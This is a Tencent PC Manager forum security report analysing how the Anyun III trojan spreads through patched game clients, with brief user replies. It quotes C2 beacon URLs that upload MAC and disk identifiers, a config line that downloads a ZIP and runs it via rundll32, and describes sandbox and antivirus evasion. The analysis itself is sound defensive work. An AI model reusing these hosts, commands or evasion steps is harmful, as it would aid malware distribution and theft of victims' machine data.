管家首页下载管家
忘了密码?

扫一扫,访问微社区

腾讯电脑管家论坛

搜索
电脑管家论坛勋章申请贴茶馆版区活动申请专用贴管家论坛活动汇总管家论坛精华帖申请管家论坛策划组成立啦!
查看: 5551|回复: 3

[安全报告] 暗云Ⅲ木马传播感染分析

[复制链接]

353

主题

0

好友

1万

积分

论坛总管

Rank: 9Rank: 9Rank: 9

帖子
24848
彩盾
33204

荣誉管理

发表于 2017-6-10 00:01 |显示全部楼层
背景:
通过对暗云Ⅲ木马持续追踪分析,腾讯电脑管家发现多个下载暗云Ⅲ木马的恶意程序。经详细分析,此类恶意程序通过对正常的“赤月传说”、“传奇霸业”等游戏微端进行patch,进而伪装成游戏通过各大下载站的下载器等多种传播渠道进行海量推广。
具体分析恶意“赤月传说”微端后,发现无论是patch方式,还是内部的shellcode,与暗云木马一致,也就是说可以确定,暗云木马的开发者与恶意游戏微端的开发者是同一伙人。

图1.传播暗云木马的恶意微端安装包及下载器

图2. 安装后的恶意文件

样本概况:
weblander.exe
md5
***dea3605878631b8feeeb53bfb5b17
***94d7d60f560c0889cebcb5ab53c11

图3. 恶意木马签名

详细分析:
木马使用patch正常游戏微端的方式将shellcode捆绑到正常程序并添加数字签名后进行推广传播。如下图所示为第一个被patch位置。
图4. 第一个被patch文件位置,右侧为木马

图5. patch前的代码

图6. patch后的代码

修改其中的一个call到第一段shellcode位置,使得第一段shellcode1得以执行。

shellcode1行为:
如下图为第二个被patch位置,存放的是shellcode1,其功能是加载被替换的资源。该资源文件原本是一张png图片,木马将其替换成一张尾部附有大量shellcode的图片,木马加载资源后直接执行该shellcode,下面称其为shellcode2。此外,执行完一系列操作后,木马会继续回到原来的位置执行代码,以不影响微端的功能。
图7. 第二个被patch的文件位置

图8. 被patch处的反汇编代码
图9.被patch处的反汇编代码

图10. 资源中的图片尾部被附上数据
图11. 被附上数据的资源图片

图12. shellcode会加载资源,提取图片尾部的附加数据

shellcode2行为:
shellcode2的格式与暗云木马完全一致,均为获取RtlDecompressBuffer函数地址,并调用加压其后数据,得到新的shellcode3并调用。
图13. shellcode头部反汇编代码

图14. shellcode2代码,解压shellcode3

shellcode3行为:
shellcode3的功能是加载其后的内存PE1文件。
图15,shellcode3代码,加载其后的PE


PE文件分析:
PE文件会对各种条件做判断,如果符合条件才会下载暗云Ⅲ感染程序到本地安装执行。这些条件包括:
1)安装包文件名格式,必须包含两个下划线和一个点,最后一个段是其推广渠道号
2)通过WMI查询磁盘名称,检测虚拟机
3)通过WMI查询进程列表,检测是否位于网吧
4)通过WMI检测杀毒软件
5)通过目录下的ini判断是否是第一次运行,只有第一次运行才会下载

条件判断合格后,将获取到的信息上传到云端,并从云端拉取配置信息:
http://c2tongji.b5156.com:89/stats.php?m=08-00-**-**-**-**&uid=b42be3fd-****-4338-****-d6fd64eb9576&hid=48DC0EC2&channelid=b108&p=9377_hyaz2a8_b108.exe&tick=26C717C1228272B9AC3A9E392CAD0721&pq=0&p3=0
该信息主要包括mac,硬盘序列号,用户id、取到号、文件名等

拉到的配置信息为:
[Update] Version=2 Url=http://update.nj***.com:8089/config/LDrvSvc.zip CmdLine=rundll32.exe LDrvSvc.dll,RundllInstall Dir=%appdata%\LDrvSvc

随后进行下载,并通过rundll 调用其中的驱动人生的LDrvSvc.dll进行安装,该dll自带安装功能。
图16. 从ini文件中提取安装包文件名,从安装包文件名中提取渠道号等信息
图17. 从ini文件里读取配置,确定是否是第一次运行


图18. 检测虚拟机

图19. 检测是否网吧环境

图20. 检测安全软件

图21. 上传mac、渠道号等信息

图22. 接收服务器返回的数据


执行完成后会继续启动游戏微端,用户完全无法察觉:
图23. 启动后的界面,可正常游戏


LDrvSvc.zip感染MBR过程分析
LDrvSvc.zip被解压后,rundll32调用ldrvsvc.dll执行安装,该dll是驱动人生的服务安装dll,能够把当前目录所有文件拷贝到参数指定的目录,并创建系统服务,启动ldrvsvc.dll
样本概况:
图24. LDrvSvc.zip中的文件列表信息

详细分析:
ldrvsvc.dll启动后,会加载同目录下的DtlCrashCath.dll等支持库文件,而DtlCrashCath.dll文件则是被替换成木马文件,从而实现白加黑利用。
图25. 各个文件属性描述

启动:
LDrvSvc.dll服务被加载后会加载DtlCrashCatch.dll以及其他几个支持库文件。DtlCrashCatch.dll是被恶意patch过的文件。
第一个patch位置如下图,被patch成call 10001a64,进而执行到10001a64
图26.第一个被patch的文件位置

图27. 被patch处的代码

第二个patch位置为10001a64,其功能是加一个偏移跳转到下一个patch位置
图28. 第二处被patch的文件位置

图29. 第二处被patch的文件位置

0x1000D4F4 + 0x11395 = 0x1001E889
第三个patch位置为一段shellcode1,其功能是解密指定尾部数据到一个共享内存,并执行解密后的shellcode2
图30. shellcode1反汇编代码

图31. Patch前后文件对比

shellcode2的格式与暗云木马完全一致,均为获取RtlDecompressBuffer函数地址,并调用加压其后数据,得到新的shellcode3并调用

图32.shellcode代码


shellcode3的功能是加载其后的内存PE1文件
图33.shellcode代码

PE1文件行为:
PE1文件的功能为sleep3分钟后从云端下载配置文件,配置文件URL为:
http://www.2t**.com/upcfg.db,其格式与暗云配置文件相似,可确定为暗云作者开发
图34. PE代码

图35. 从云端下载配置文件upcfg.db

下载完配置文件,进行解密,解密算法与暗云中解密配置文件的算法相同,解密后判断前4字节是否为0xA5A5A5A5,是的话调用其后的shellcode1
图36. 解密配置文件,得到shellcode并执行

shellcode1功能是RtlDecompressBuffer其后的数据得到shellcode2,并调用
图37.shellcode1行为

shellcode2的功能是内存展开其后的PE2文件
图38. shellcode2代码,其功能是内存加载PE2

PE2文件行为:

进行暗云MBR感染

电脑管家新上桌面整理特性,欢迎前往腾讯电脑管家官网https://guanjia.qq.com/main.html了解管家最新动态
羊粪蛋        

0

主题

0

好友

2

积分

[LV.1] PCMgr Alpha

Rank: 1

帖子
3
彩盾
7
发表于 2017-6-11 08:04 |显示全部楼层
我电脑就是这样中毒的,目前还无解,求助!~~~~(>_<)~~~~

点评

腾讯shine  中了暗云3?我们联系你看一下。  发表于 2017-6-14 10:19
回复

使用道具 举报

10

主题

0

好友

26

积分

[LV.1] PCMgr Alpha

Rank: 1

帖子
20
彩盾
116
发表于 2017-6-11 11:18 |显示全部楼层
看不懂啊,肿么办?
回复

使用道具 举报

1

主题

0

好友

3

积分

[LV.1] PCMgr Alpha

Rank: 1

帖子
3
彩盾
6
发表于 2017-6-17 01:01 |显示全部楼层
根本就看不懂....
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册
您需要登录后才可以发帖 QQ登录

手机版|Archiver|Tencent Inc   

GMT+8, 2017-10-21 21:53 , Processed in 0.645293 second(s), 9 queries , Memcache On.

Powered by Discuz! X2.5

© 2001-2012 Comsenz Inc.

回顶部